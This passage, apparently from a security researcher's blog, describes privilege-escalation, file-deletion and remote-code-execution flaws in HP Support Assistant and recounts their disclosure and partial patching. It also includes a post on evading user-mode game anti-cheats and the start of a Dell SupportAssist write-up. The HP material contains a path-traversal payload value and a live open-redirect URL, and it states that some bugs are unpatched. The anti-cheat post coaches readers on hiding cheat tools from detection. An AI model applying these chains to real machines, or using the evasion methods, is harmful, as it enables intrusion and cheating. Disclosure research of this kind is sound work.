At the end of the day, we can place any file anywhere we want in the context of a SYSTEM process allowing for escalation of privileges.

Discovery: Local Privilege Escalation #5

The next protected method we’ll be looking at is CreateInstantTask. For our purposes, this is a pretty simple function to review.

The method takes in three arguments. The String parameter updatePath which represents the path to the update binary, the name of the update, and the arguments to pass to the update binary.

The first verification step is checking the path of the update binary.

This verification method will first ensure that the update path is an absolute path that does not lead to a junction or reparse point. Good job on HP for checking this.

The next check is that the update path "starts with" a whitelisted base path. For my 64-bit machine, MainAppPath expands to C:\Program Files (x86)\Hewlett Packard\HP Support Framework and FrameworkPath expands to C:\Program Files (x86)\Hewlett Packard\HP Support Solutions.

What this check essentially means is that since our path has to be absolute AND it must start with a path to HP’s Program Files directory. The update path must actually be in their installation folder.

The final verification step is ensuring that the update path points to a binary signed by HP.

If all of these checks pass, the method creates a Task Scheduler task to be executed immediately by an Administrator. If any Administrator is logged on, the binary is immediately executed.

Exploitation: Local Privilege Escalation #5

A tricky one. Our update path must be something in HP’s folders, but what could that be? This stumped me for a while, but I got a spark of an idea while brainstorming.

We have the ability to start ANY program in HP’s installation folder with ANY arguments, interesting. What types of binaries does HP’s installation folders have? Are any of them interesting?

I found a few interesting binaries in the whitelisted directories such as Extract.exe and unzip.exe. On older versions, we could use unzip.exe, but a new update implements a signature check. Extract.exe didn’t even work when I tried to use it normally. I peeked at several binaries in dnSpy and I found an interesting one, HPSF_Utils.exe.

When the binary was started with the argument "encrypt" or "decrypt", the method below would be executed.

If we passed "encrypt" as the first argument, the method would take the second argument, read it in and encrypt it, then write it to the file specified at the third argument. If we passed "decrypt", it would do the same thing except read in an encrypted file and write the decrypted version to the third argument path.

If you haven’t caught on to why this is useful, the reason it’s so useful is because we can abuse the decrypt functionality to write our malicious file to anywhere in the system, easily allowing us to escalate privileges. Since this binary is in the whitelisted path, we can execute it and abuse it to gain Administrator because we can write anything to anywhere.

Arbitrary File Deletion Vulnerabilities

Discovery: Arbitrary File Deletion

Let’s start with some arbitrary file deletion vulnerabilities. Although file deletion probably won’t lead to Local Privilege Escalation, I felt that it was serious enough to report because I could seriously mess up a victim’s machine by abusing HP’s software.

The protected method we’ll be looking at is LogSoftPaqResults. This method is very short for our purposes, all we need to read are the first few lines.

When the method is called, it will combine the temporary path C:\Windows\TEMP and the ExecutableName from the untrusted action item base using an unsafe string concatenation. If the file at this path exists AND it is not signed by HP, it will go ahead and delete it.

Exploitation: Arbitrary File Deletion #1

This is a pretty simple bug. Since HP uses unsafe string concatenation on path strings, we can just escape out of the C:\Windows\TEMP directory via relative path escapes (i.e ../) to reach any file we want.

If that file exists and isn’t signed by HP, the method which is running in the context of a SYSTEM process will delete that file. This is pretty serious because imagine if I ran this on the entirety of your system32 folder. That would definitely not be good for your computer.

Exploitation: Arbitrary File Deletion #2

This bug was even simpler than the last one, so I decided not to create a dedicated discovery section. Let’s jump into the past and look at the protected method UncompressCabFile.
When the method starts, as we reviewed before, the following is checked:

cabFilePath (path to the cabinet file to extract) exists.
cabFilePath is signed by HP.
Our token is "trusted" and the cabFilePath contains a few pre-defined paths.

If these conditions are not met, the method will delete the file specified by cabFilePath.

If we want to delete a file, all we need to do is specify pretty much any path in the cabFilePath argument and let the method delete it while running as the SYSTEM user.

Remote Code Execution Vulnerability

Discovery

For most of this report we’ve reviewed vulnerabilities inside the HP service. In this section, we’ll explore a different HP binary. The methods reviewed in "General Exploitation" will not apply to this bug.

When I was looking for attack surfaces for Remote Code Execution, one of the first things I checked was for registered URL Protocols. Although I could find these manually in regedit, I opted to use the tool URLProtocolView. This neat tool will allow us to easily enumerate the existing registered URL Protocols and what command line they execute.

Scrolling down to "hp" after sorting by name showed quite a few options.

The first one looked mildly interesting because the product name of the binary was "HP Download and Install Assistant", could this assist me in achieving Remote Code Execution? Let’s pop it open in dnSpy.

The first thing the program does is throw the passed command line arguments into its custom argument parser. Here are the arguments we can pass into this program:

remotefile = The URL of a remote file to download.
filetitle = The name of the file downloaded.
source = The "launch point" or the source of the launch.
caller = The calling process name.
cc = The country used for localization.
lc = The language used for localization.

After parsing out the arguments, the program starts creating a "download request". The method will read the download history to see if the file was already downloaded. If it wasn’t downloaded before, the method adds the download request into the download requests XML file.

After creating the request, the program will "process" the XML data from the history file. For every pending download request, the method will create a downloader.

During this creation is when the first integrity checks are done. The constructor for the downloader first extracts the filename specified in the remotefile argument. It parses the name out by finding the last index of the character / in the remotefile argument and then taking the substring starting from that index to the end of the string. For example, if we passed in https://example.com/test.txt for the remote file, the method would parse out text.txt.

If the file name contains a period, verification on the extension begins. First, the method parses the file extension by getting everything after the last period in the name. If the extension is exe, msi, msp, msu, or p2 then the download is marked as an installer. Otherwise, the extension must be one of 70 other whitelisted extensions. If the extension is not one of those, the download is cancelled.

After verifying the file extension, the complete file path is created.

First, if the lc argument is ar (Arabic), he (Hebrew), ru (Russian), zh (Chinese), ko (Korean), th (Thai), or ja (Japanese), your file name is just the name extracted from the URL. Otherwise, your file name is the filetitle argument, –, and the file name from the URL combined. Finally, the method will replace any invalid characters present in Path.GetInvalidFileNameChars with a space.

This sanitized file name is then combined with the current user's download folder + HP Downloads.

The next relevant step is for the download to begin, this is where the second integrity check is. First, the remote file URL argument must begin with https. Next, a URI object is created for the remote file URL. The host of this URI must end with .hp.com or end with .hpicorp.net. Only if these checks are passed is the download started.

Once the download has finished, another check is done. Before the download is marked as downloaded, the program verifies the downloaded content. This is done by first checking if the download is an installer, which was set during the file name parsing stage. If the download is an installer then the method will verify the certificate of the downloaded file. If the file is not an installer, no check is done.

The first step of verifying the certificate of the file is to check that it matches the binary. The method does this by calling WinVerifyTrust on the binary. The method does not care if the certificate is revoked. The next check is extracting the subject of the certificate. This subject field must contain in any case hewlett-packard, hewlett packard, or o=hp inc.

When the client presses the open or install button on the form, this same check is done again, and then the file is started using C#’s Process.Start. There are no arguments passed.

Exploitation

There are several ways to approaching exploiting this program. In the next sections, I’ll be showing different variants of attacking and the pros/cons of each one. Let’s start by bypassing a check we need to get past for any variant, the URL check.

As we just reviewed, the remote URL passed must have a host that ends with .hp.com or .hpicorp.net. This is tricky because the verification method uses the safe and secure way of verifying the URL’s host by first using C#’s URI parser. Our host will really need to contain .hp.com or .hpicorp.net.

A previous vulnerability in this report had the same issue. If you haven't read that section, I would highly recommend it to understand where we got this magical open redirect vulnerability in one of HP's websites: https://ers.rssx.hp.com/ers/redirect?targetUrl=https://google.com.

Back to the verification method, this open redirect bug is on the host ers.rssx.hp.com which does end in .hp.com making it a perfect candidate for an attack. We can redirect to our own web server where we can host any file we want.

This sums up the "general" exploitation portion of the Remote Code Execution bugs. Let’s get into the individual ones.

Remote Code Execution Variant #1

The first way I would approach this seeing what type of file we can have our victim download without the HP program thinking it’s an installer. Only if it’s an installer will the program verify its signature.

Looking at the whitelisted file extensions, we don’t have that much to work with, but we have some options. One whitelisted option is zip, this could work. An ideal attack scenario would be a website telling you need a critical update, the downloader suddenly popping up with the HP logo, the victim pressing open on the zip file and executing a binary inside it.

To have a valid remote file URL, we will need to abuse the open redirect bug. I put my bad file on my web server and just put the URL to the zip file at the end of the open redirect URL.

When the victim visits my malicious website, an iframe with the hpdia:// URL Protocol is loaded and the download begins.

This attack is somewhat lame because it requires two clicks to RCE, but I still think it’s more than a valid attack method since the HP downloader looks pretty legit.

Remote Code Execution Variant #2

My next approach is definitely more interesting then the last. In this method, we first make the program download a DLL file which is NOT an installer, then we install a signed HP binary who depends on this DLL.

Similar to our DLL Hijacking attack in the third Local Privilege Escalation vulnerability, we can use any signed binary which imports a DLL that doesn’t exist. By simply naming our malicious DLL to the missing DLL name, the executed signed program will end up loading our malicious DLL giving us Remote Code Execution.

Here’s the catch. We’re going to have to set the language of the downloader to Arabic, Hebrew, Russian, Chinese, Korean, Thai, or Japanese. The reason is for DLL Hijacking, we need to set our malicious DLL name to exactly that of the missing DLL.

If you recall the CreateLocalFilename method, the actual filename will have – in it if the language we pass in through arguments is not one of those languages. If we do pass in a language that’s one of the ones checked for in the function above, the filename will be the filename specified in the remote URL.

If your target victim is in a country where one of these languages is spoken commonly, this is in my opinion the best attack route. Otherwise, it may be a bit of an optimistic approach.

Whenever the victim presses on any of the open or install all buttons, the signed binary will start and load our malicious DLL. If your victim is in an English country or only speaks English, this may be a little more difficult.

You could have the website present a critical update guide telling the visitor what button to press to update their system, but I am not sure if a user is more likely to press a button in a foreign language or open a file in a zip they opened.

At the end of the day, this is a one click only attack method, and it would work phenomenal in a country that uses the mentioned languages. This variant can also be used after detecting the victim’s language and seeing if it’s one of the few languages we can use with this variant. You can see the victim’s language in HTTP headers or just the "navigator language" in javascript.

Remote Code Execution Variant #3

The last variant for achieving remote code execution is a bit optimistic in how much resources the attacker has, but I don’t think it a significant barrier for an APT.

To review, if the extension of the file we’re downloading is considered an installer (see installer extensions in discovery), our binary will be checked for HP’s signature. Let’s take a look at the signature check.

The method takes in a file name and first verifies that it’s a valid certificate. This means a certificate ripped from a legitimate HP binary won’t work because it won’t match the binary. The concerning part is the check for if the certificate is an HP certificate.

To be considered an HP certificate, the subject of the certificate must contain in any case hewlett-packard, hewlett packard, or o=hp inc. This is a pretty inadequate check, especially that lower case conversion. Here are a few example companies I can form that would pass this check:

[something]hewlett PackArd[someting]
HP Inc[something]

I could probably spend days making up company names. All an attacker needs to do is create an organization that contains any of those words and they can get a certificate for that company. Next thing you know, they can have a one click RCE for anyone that has the HP bloatware installed.

Proof of Concept

Local Privilege Escalation Vulnerabilities

Remote Code Execution Vulnerabilities

"Remediation"

HP had their initial patch finished three months after I sent them the report of my findings. When I first heard they were aiming to patch 10 vulnerabilities in such a reasonable time-frame, I was impressed because it appeared like they were being a responsible organization who took security vulnerabilities seriously. This was in contrast to the performance I saw last year with my research into Remote Code Execution in Dell's bloatware where they took 6 months to deliver a patch for a single vulnerability, an absurd amount of time.

In the following section, I'll be going over the vulnerabilities HP did not patch or patched inadequately. Here is an overview of what was actually patched:

Local Privilege Escalation #1 – Patched ✔️
Local Privilege Escalation #2 – Unpatched ❌
Local Privilege Escalation #3 – Unpatched ❌
Local Privilege Escalation #4 – "Patched" 😕 (not really)
Local Privilege Escalation #5 – Unpatched ❌
Arbitrary File Deletion #1 – Patched ✔️
Arbitrary File Deletion #2 – Patched ✔️
Remote Code Execution Variant #1 – Patched ✔️
Remote Code Execution Variant #2 – Patched ✔️
Remote Code Execution Variant #3 – Patched ✔️

Re-Discovery

New Patch, New Vulnerability

The largest change observed is the transition from the hardcoded "C:\Windows\TEMP" temporary directory to relying on the action item base supplied by the client to specify the temporary directory.

I am not sure if HP PSIRT did not review the patch or if HP has a lack of code review in general, but this transition actually introduced a new vulnerability. Now, instead of having a trusted hardcoded string be the deciding factor for the temporary directory… HP relies on untrusted client data (the action item base).

As an attacker, my unprivileged process is what decides the value of the temporary directory used by the elevated agent, not the privileged service process, allowing for simple spoofing. This was one of the more shocking components of the patch. HP had not only left some vulnerabilities unpatched but in doing so ended up making some code worse than it was. This change mostly impacted the Local Privilege Escalation vulnerabilities.

Local Privilege Escalation #2

Looking over the new InstallSoftpaqsSilently method, the primary changes are:

The untrusted ActionItemBase specifies the temporary directory.
There is more insecure path concatenation (path1 + path2 versus C#’s Path.Combine).
There is more verification on the path specified by the temporary directory and executable name (i.e checking for relative path escapes, NTFS reparse points, rooted path, etc).

The core problems that are persistent even after patching:

The path that is executed by the method still utilizes unvalidated untrusted client input. Specifically, the method splits the item property SilentInstallString by double quote and utilizes values from that array for the name of the binary. This binary name is not validated besides a simple check to see if the file exists. No guarantees it isn’t an attacker’s binary.
There is continued use of insecure coding practices involving paths. For example, HP consistently concatenates paths by using the string combination operator versus using a secure concatenation method such as Path.Combine.

In order to have a successful call to InstallSoftpaqsSilently, you must now meet these requirements:

The file specified by the TempDirectory property + ExecutableName property must exist.
The file specified by TempDirectory property + ExecutableName property must be signed by HP.
The path specified by TempDirectory property + ExecutableName property must pass the VerifyHPPath requirements:
a. The path cannot contain relative path escapes.
b. The path must be a rooted path.
c. The path must not be a junction point.
d. The path must start with HP path.
The SilentInstallString property must contain the SPName property + .exe.
The directory name is the TempDirectory property + swsetup\ + the ExecutableName property with .exe stripped.
The Executable Name is specified in the SilentInstallString property split by double quote. If the split has a size greater than 1, it will take the second element as EXE Name, else the first element.
The Executable Name must not contain .exe or .msi, otherwise, the Directory Name + \ + the Executable Name must exist.
The function executes the binary specified at Directory Name + \ + Executable Name.

The core point of attack is outlined in step 6 and 7. We can control the Executable Name by formulating a malicious payload for the SilentInstallString item property that escapes a legitimate directory passed in the TempDirectory property into an attacker controlled directory.

For example, if we pass:

C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\ for the TempDirectory property.
HPSF.exe for the the ExecutableName property.
malware for the SPName property.
"..\..\..\..\..\Malware\malware.exe (quote at beginning intentional) for the SilentInstallString property.

The service will execute the binary at C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\swsetup\HPSF\..\..\..\..\..\Malware\malware.exe which ends up resolving to C:\Malware\malware.exe thus executing the attacker controlled binary as SYSTEM.

Local Privilege Escalation #3

The primary changes for the new InstallSoftpaqsDirectly method are:

The untrusted ActionItemBase specifies the temporary directory.
Invalid binaries are no longer deleted.

The only thing we need to change in our proof of concept is to provide our own TempDirectory path. That’s… it.

Local Privilege Escalation #4

For the new DownloadSoftpaq method, the primary changes are:

The download URL cannot have query parameters.

The core problems that are persistent even after patching:

Insecure validation of the download URL.
Insecure validation of the downloaded binary.
Open Redirect bug on ers.rssx.hp.com.

First of all, HP still only does a basic check on the hostname to ensure it ends with a whitelisted host, however, this does not address the core issue that this check in itself is insecure.

Simply checking hostname exposes attacks from Man-in-the-Middle attacks, other Open Redirect vulnerabilities, and virtual host based attacks (i.e a subdomain that redirects to 127.0.0.1).

For an unknown reason, HP still does not delete the binary downloaded if it does not have an HP signature because HP passes the constant false for the parameter that indicates whether or not to delete a bad binary.

At the end of the day, this is still a patched vulnerability since at this time you can’t quite exploit it, but I wouldn’t be surprised to see this exploited in the future.

Local Privilege Escalation #5

This vulnerability was completed untouched. Not much more to say about it.

Timeline

Here is a timeline of HP's response:

10/05/2019 - Initial report of vulnerabilities sent to HP.
10/08/2019 - HP PSIRT acknowledges receipt and creates a case.
12/19/2019 - HP PSIRT pushes an update and claims to have "resolved the issues reported".
01/01/2020 - Updated report of unpatched vulnerabilities sent to HP.
01/06/2020 - HP PSIRT acknowledges receipt.
02/05/2020 - HP PSIRT schedules a new patch for the first week of March.
03/09/2020 - HP PSIRT pushes the scheduled patch to 03/21/2020 due to Novel Coronavirus complications.

Protecting your machine

If you're wondering what you need to do to ensure your HP machine is safe from these vulnerabilities, it is critical to ensure that it is up to date or removed. By default, HP Support Assistant does not have automatic updating by default unless you explicitly opt-in (HP claims otherwise).

It is important to note that because HP has not patched three local privilege escalation vulnerabilities, even if you have the latest version of the software, you are still vulnerable unless you completely remove the agent from your machine (Option 1).

Option 1: Uninstall

The best mitigation to protect against the attacks described in this article and future vulnerabilities is to remove the software entirely. This may not be an option for everyone, especially if you rely on the updating functionality the software provides, however, removing the software ensures that you're safe from any other vulnerabilities that may exist in the application.

For most Windows installations, you can use the "Add or remove programs" component of the Windows control panel to uninstall the service. There are two pieces of software to uninstall, one is called "HP Support Assistant" and the other is called "HP Support Solutions Framework".

Option 2: Update

The next best option is to update the agent to the latest version. The latest update fixes several vulnerabilities discussed except for three local privilege escalation vulnerabilities.

There are two ways to update the application, the recommended method is by opening "HP Support Assistant" from the Start menu, click "About" in the top right, and pressing "Check for latest version". Another method of updating is to install the latest version from HP's website here.

Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats

Bill Demirkapi — Mon, 02 Dec 2019 15:05:00 GMT

The market for cheating in video games has grown year after year, incentivizing game developers to implement stronger anti-cheat solutions. A significant amount of game companies have taken a rather questionable route, implementing more and more invasive anti-cheat solutions in a desperate attempt to combat cheaters, still ending up with a game that has a large cheating community. This choice is understandable. A significant amount of cheaters have now moved into the kernel realm, challenging anti-cheat developers to now design mitigations that combat an attacker who shares the same privilege level. However, not all game companies have followed this invasive path, some opting to use anti-cheats that reside in the user-mode realm.

I've seen a significant amount of cheaters approach user-mode anti-cheats the same way they would approach a kernel anti-cheat, often unknowingly making the assumption that the anti-cheat knows everything, and thus approaching them in an ineffective manner. In this article, we'll look at how to leverage our escalated privileges, as a cheater, to attack the insecure design these unprivileged solutions are built on.

Introduction

When attacking anything technical, one of the first steps I take is to try and put myself in the mind of a defender. For example, when I reverse engineer software for security vulnerabilities, putting myself in the shoes of the developer allows me to better understand the design of the application. Understanding the design behind the logic is critical for vulnerability research, as this often reveals points of weakness that deserve a dedicated look over. When it comes to anti-cheats, the first step I believe any attacker should take is understanding the scope of the application.

What I mean by scope is posing the question, What can the anti-cheat "see" on the machine? This question is incredibly important in researching these anti-cheats, because you may find blind spots on a purely design level. For user-mode anti-cheats, because they live in an unprivileged context, they're unable to access much and must be creative while developing detection vectors. Let's take a look at what access unprivileged anti-cheats truly have and how we can mitigate against it.

Investigating Detection Vectors

The Filesystem

Most access in Windows is restricted by the use of security descriptors, which dictate who has permissions on an object and how to audit the usage of the object.

For example, if a file or directory has the Users group in its security descriptor, i.e

That means pretty much any user on the machine can can access this file or directory. When anti-cheats are in an unprivileged context, they're strictly limited in what they can access on the filesystem, because they're unable to ignore these security descriptors. As a cheater, this provides the unique opportunity to abuse these security descriptors against them to stay under their radars.

Filesystem access is a large part of these anti-cheats because if you run a program with elevated privileges, the unprivileged anti-cheat cannot open a handle to that process. This is due to the difference between their elevation levels, but not being able to open the process is far from being game over. The first method anti-cheats can use to "access" the process is by just opening the process's file. More often than not, the security descriptor for a significant amount of files will be accessible from an unprivileged context.

For example, typically anything in the "Program Files" directory in the C: drive has a security descriptor that permits for READ and EXECUTE access to the Users group or allows the Administrators group FULL CONTROL on the directory. Since the Users group is permitted access unprivileged processes are able to access files in these directories. This is relevant for when you launch a cheating program such as Cheat Engine, one detection vector they have is just reading in the file of the process and checking for cheating related signatures.

NT Object Manager Leaks

Filesystem access is not the only trick user-mode anti-cheats have. The next relevant access these anti-cheats have is a significant amount of query access to the current session. In Windows, sessions are what separates active connections to the machine. For example, you being logged into the machine is a session and someone connected to another user via a Remote Desktop will have their own session too. Unprivileged anti-cheats can see almost everything going on in the session that the anti-cheat runs in. This significant access allows anti-cheats to develop strong detection vectors for a lot of different cheats.

Let's see what unprivileged processes can really see. One neat way to view what's going on in your session is by the use of the WinObj Sysinternals utility. WinObj allows you to see a plethora of information about the machine without any special privileges.

WinObj can be run with or without Administrator privileges, however, I suggest using Administrator privileges during investigation because sometimes you cannot "list" one of the directories above, but you can "list" sub-folders. For example, even for your own session, you cannot "list" the directory containing the BaseNamedObjects, but you can access it directly using the full path \Session\[session #]\BaseNamedObjects.

User-mode anti-cheat developers hunt for information leaks in these directories because the information leaks can be significantly subtle. For example, a significant amount of tools in kernel expose a device for IOCTL communication. Cheat Engine's kernel driver "DBVM" is an example of a more well-known issue.

Since by default Everyone can access the Device directory, they can simply check if any devices have a blacklisted name. More subtle leaks happen as well. For example, IDA Pro uses a mutex with a unique name, making it simple to detect when the current session has IDA Pro running.

Window Enumeration

A classic detection vector for all kinds of anti-cheats is the anti-cheat enumerating windows for certain characteristics. Maybe it's a transparent window that's always the top window, or maybe it's a window with a naughty name. Windows provide for a unique heuristic detection mechanism given that cheats often have some sort of GUI component.

To investigate these leaks, I used Process Hacker's "Windows" tab that shows what windows a process has associated with it. For example, coming back to the Cheat Engine example, there are plenty of windows anti-cheats can look for.

User-mode anti-cheats can enumerate windows via the use of EnumWindows API (or the API that EnumWindows calls) which allow them to enumerate every window in the current session. There can be many things anti-cheats look for in windows, whether that be the class, text, the process associated with the window, etc.

NtQuerySystemInformation

The next most lethal tool in the arsenal of these anti-cheats is NtQuerySystemInformation. This API allows even unprivileged processes to query a significant amount of information about what's going on in your computer.

There's too much data provided to cover all of it, but let's see some of the highlights of NtQuerySystemInformation.

NtQuerySystemInformation with the class SystemProcessInformation provides a SYSTEM_PROCESS_INFORMATION structure, giving a variety amount of info about every process.
NtQuerySystemInformation with the class SystemModuleInformation provides a RTL_PROCESS_MODULE_INFORMATION structure, giving a variety amount of info about every loaded driver.
NtQuerySystemInformation with the class SystemHandleInformation provides a SYSTEM_HANDLE_INFORMATION structure, giving a list of every open handle in the system.
NtQuerySystemInformation with the class SystemKernelDebuggerInformation provides a SYSTEM_KERNEL_DEBUGGER_INFORMATION structure, which tells the caller whether or not a kernel debugger is loaded (i.e WinDbg KD).
NtQuerySystemInformation with the class SystemHypervisorInformation provides a SYSTEM_HYPERVISOR_QUERY_INFORMATION structure, indicating whether or not a hypervisor is present.
NtQuerySystemInformation with the class SystemCodeIntegrityPolicyInformation provides a SYSTEM_CODEINTEGRITY_INFORMATION structure, indicating whether or not various code integrity options are enabled (i.e Test Signing, Debug Mode, etc).

This is only a small subset of what NtQuerySystemInformation exposes and it's important to remember these data sources while designing a secure cheat.

Circumventing Detection Vectors

Time for my favorite part. What's it worth if I just list all the possible ways for user-mode anti-cheats to detect you, without providing any solutions? In this section, we'll look over the detection vectors we mentioned above and see different ways to mitigate against them. First, let's summarize what we found.

User-mode anti-cheats can use the filesystem to get a wide variety of access, primarily to access processes that are inaccessible via conventional methods (i.e OpenProcess).
User-mode anti-cheats can use a variety of objects Windows exposes to get an insight into what is running in the current session and machine. Often times there may be hard to track information leaks that anti-cheats can use to their advantage, primarily because unprivileged processes have a lot of query power.
User-mode anti-cheats can enumerate the windows of the current session to detect and flag windows that match the attributes of blacklisted applications.
User-mode anti-cheats can utilize the enormous amount of data the NtQuerySystemInformation API provides to peer into what's going on in the system.

Circumventing Filesystem Detection Vectors

To restate the investigation section regarding filesystems, we found that user-mode anti-cheats could utilize the filesystem to get access they once did not have before. How can an attacker evade filesystem based detection routines? By abusing security descriptors.

Security descriptors are what truly dictates who has access to an object, and in the filesystem this becomes especially important in regards to who can read a file. If the user-mode anti-cheat does not have permission to read an object based on its security descriptors, then they cannot read that file. What I mean is, if you run a process as Administrator, preventing the anti-cheat from opening the process and then you remove access to the file, how can the anti-cheat read the file? This method of abusing security descriptors would allow an attacker to evade detections that involve opening processes through the filesystem.

You may feel wary when thinking about restricting unprivileged access to your process, but there are many subtle ways to achieve the same result. Instead of directly setting the security descriptor of the file or folder, why not find existing folders that have restricted security descriptors?

For example, the directory C:\Windows\ModemLogs already prevents unprivileged access.

The directory by default disallows unprivileged applications from accessing it, requiring at least Administrator privileges to access it. What if you put your naughty binary in here?

Another trick to evade information leaks in places such as the Device directory or BaseNamedObjects directory is to abuse their security descriptors to block access to the anti-cheat. I strongly advise that you utilize a new sandbox account, however, you can set the permissions of directories such as the Device directory to deny access to certain security principles.

Using security descriptors, we can block access to these directories to prevent anti-cheats from traversing them. All we need to do in the example above is run the game as this new user and they will not have access to the Device directory. Since security descriptors control a significant amount of access in Windows, it's important to understand how we can leverage them to cut off anti-cheats from crucial data sources.

The solution of abusing security descriptors isn't perfect, but the point I'm trying to make is that there is a lot of room for becoming undetected. Given that most anti-cheats have to deal with a mountain full of compatibility issues, it's unlikely that most abuse would be detected.

Circumventing Object Detection and Window Detection

I decided to include both Object and Window detection in this section because the circumvention can overlap. Starting with Object detection, especially when dealing with tools that you didn't create, understanding the information leaks a program has is the key to evading detection.

The example brought up in investigation was the Cheat Engine driver's device name and IDA's mutex. If you're using someone elses software, it's very important that you look for information leaks, primarily because they may not be designed with preventing information leaks in mind.

For example, I was able to make TitanHide undetected by several user-mode anti-cheat platforms by:

Utilizing the previous filesystem trick to prevent access to the driver file.
Changing the pipe name of TitanHide.
Changing the log output of TitanHide.

These steps are simple and not difficult to conceptualize. Read through the source code, understand detection surface, and harden these surfaces. It can be as simple as changing a few names to become undetected.

When creating your own software that has the goal of combating user-mode anti-cheats, information leaks should be a key step when designing the application. Understanding the internals of Windows can help a significant amount, because you can better understand different types of leaks that can occur.

Transitioning to a generic circumvention for both object detection and window detection is through the abuse of multiple sessions. The mentioned EnumWindows API can only enumerate windows in the current session. Unprivileged processes from one session can't access another session's objects. How do you use multiple sessions? There are many ways, but here's the trick I used to bypass a significant amount of user-mode anti-cheats.

I created a new user account.
I set the security descriptor of my naughty tools to be inaccessible by an unprivileged context.
I ran any of my naughty tools by switching users and running it as that user.

Those three simple steps are what allowed me to use even the most common utilities such as Cheat Engine against some of the top user-mode anti-cheats. Unprivileged processes cannot access the processes of another user and they cannot enumerate any objects (including windows) of another session. By switching users, we're entering another session, significantly cutting off the visibility anti-cheats have.

A mentor of mine, Alex Ionescu, pointed out a different approach to preventing an unprivileged process from accessing windows in the current session. He suggested that you can put the game process into a job and then set the JOB_OBJECT_UILIMIT_HANDLES UI restriction. This would restrict any processes in the job from accessing "USER" handles of processes outside of the job, meaning that the user-mode anti-cheat could not access windows in the same session. The drawback of this method is that the anti-cheat could detect this restriction and could choose to crash/flag you. The safest method is generally not touching the process itself and instead evading detection using generic methods (i.e switching sessions).

Circumventing NtQuerySystemInformation

Unlike the previous circumvention methods, evading NtQuerySystemInformation is not as easy. In my opinion, the safest way to evade detection routines that utilize NtQuerySystemInformation is to look at the different information classes that may impact you and ensure you do not have any unique information leaks through those classes.

Although NtQuerySystemInformation does give a significant amount of access, it's important to note that the data returned is often not detailed enough to be a significant threat to cheaters.

If you would like to restrict user-mode anti-cheat access to the API, there is a solution. NtQuerySystemInformation respects the integrity level of the calling process and significantly limits access to Restricted Callers. These callers are primarily those who have a token below the medium integrity level. This sandboxing can allow us to limit a significant amount of access to the user-mode anti-cheat, but with the cost of a potential detection vector. The anti-cheat could choose to crash if its ran under a medium integrity level which would stop this trick.

When at a low integrity level, processes:

Cannot query handles.
Cannot query kernel modules.
Can only query other processes with equal or lower integrity levels.
Can still query if a kernel debugger is present.

When testing with Process Hacker, I found some games with user-mode anti-cheats already crashed, perhaps because they received an ACCESS_DENIED error for one of their detection routines. An important reminder as with the previous job limit circumvention method. Since this trick does directly touch the process, it is possible anti-cheats can simply crash or flag you for setting their integrity level. Although I would strongly suggest you develop your cheats in a manner that does not allow for detection via NtQuerySystemInformation, this sandboxing trick is a way of suppressing some of the leaked data.

Test Signing

If I haven't yet convinced you that user-mode anti-cheats are easy to circumvent, it gets better. On all of the user-mode anti-cheats I tested test signing was permitted, allowing for essentially any driver to be loaded, including ones you create.

If we go back to our scope, drivers really only have a few detection vectors:

User-mode anti-cheats can utilize NtQuerySystemInformation to get basic information on kernel modules. Specifically, the anti-cheat can obtain the kernel base address, the module size, the path of the driver, and a few other properties. You can view exactly what's returned in the definition of RTL_PROCESS_MODULE_INFORMATION. This can be circumvented by basic security practices such as ensuring the data returned in RTL_PROCESS_MODULE_INFORMATION is unique or by modifying the anti-cheat's integrity level.
User-mode anti-cheats can query the filesystem to obtain the driver contents. This can be circumvented by changing the security descriptor of the driver.
User-mode anti-cheats can hunt for information leaks by your driver (such as using a blacklisted device name) to identify it. This can be circumvented by designing your driver to be secure by design (unlike many of these anti-cheats).

Circumventing the above checks will result in an undetected kernel driver. The information leak prevention can be difficult, however, if you know what you're doing, you should understand what APIs may leak certain information accessible by these anti-cheats.

I hope I have taught you something new about combating user-mode anti-cheats and demystified their capabilities. User-mode anti-cheats come with the benefit of having a less invasive product that doesn't infringe on the privacy of players, but at the same time are incredibly weak and limited. They can appear scary at first, given their usual advantage in detecting "internal" cheaters, but we must realize how weak their position truly is. Unprivileged processes are as the name suggests unprivileged. Stop wasting time treating these products as any sort of challenge, use the operating system's security controls to your advantage. User-mode anti-cheats have already lost, quit acting like they're any stronger than they really are.

Local Privilege Escalation on Dell machines running Windows

Bill Demirkapi — Fri, 19 Jul 2019 14:30:00 GMT

In May, I published a blog post detailing a Remote Code Execution vulnerability in Dell SupportAssist. Since then, my research has continued and I have been finding more and more vulnerabilities. I strongly suggest that you read my previous blog post, not only because it provides a solid conceptual understanding of Dell SupportAssist, but because it's a very interesting bug.

This blog post will cover my research into a Local Privilege Escalation vulnerability in Dell SupportAssist. Dell SupportAssist is advertised to "proactively check the health of your system’s hardware and software". Unfortunately, Dell SupportAsssist comes pre-installed on most of all new Dell machines running Windows. If you're on Windows, never heard of this software, and have a Dell machine - chances are you have it installed.

Discovery

Amusingly enough, this bug was discovered while I was doing my write-up for the previous remote code execution vulnerability. For switching to previous versions of Dell SupportAssist, my method is to stop the service, terminate the process, replace the binary files with an older version, and finally start the service. Typically, I do this through a neat tool called Process Hacker, which is a vamped up version of the built-in Windows Task Manager. When I started the Dell SupportAssist agent, I saw this strange child process.

I had never noticed this process before and instinctively I opened the process to see if I could find more information about it.

We straight away can tell that it's a .NET Application given the ".NET assemblies" and ".NET performance" tabs are populated. Browsing various sections of the process told us more about it. For example, the "Token" tab told us that this was an unelevated process running as the current user.

While scrolling through the "Handles" tab, something popped out at me.

For those who haven't used Process Hacker in the past, the cyan color indicates that a handle is marked as inheritable. There are plenty of processes that have inheritable handles, but the key part about this handle was the process name it was associated with. This was a THREAD handle to SupportAssistAgent.exe, not SupportAssistAppWire.exe. SupportAssistAgent.exe was the parent SYSTEM process that created SupportAssistAppWire.exe - a process running in an unelevated context. This wasn't that big of a deal either, a SYSTEM process may share a THREAD handle to a child process - even if it's unelevated, but with restrictive permissions such as THREAD_SYNCHRONIZE. What I saw next is where the problem was evident.

This was no restricted THREAD handle that only allowed for basic operations, this was straight up a FULL CONTROL thread handle to SupportAssistAgent.exe. Let me try to put this in perspective. An unelevated process has a FULL CONTROL handle to a thread in a process running as SYSTEM. See the issue?

Let's see what causes this and how we can exploit it.

Reversing

Every day, Dell SupportAssist runs a "Daily Workflow Task" that performs several actions typically to execute routine checks such as seeing if there is a new notification that needs to be displayed to the user. Specifically, the Daily Workflow Task will:

Attempt to query the latest status of any cases you have open
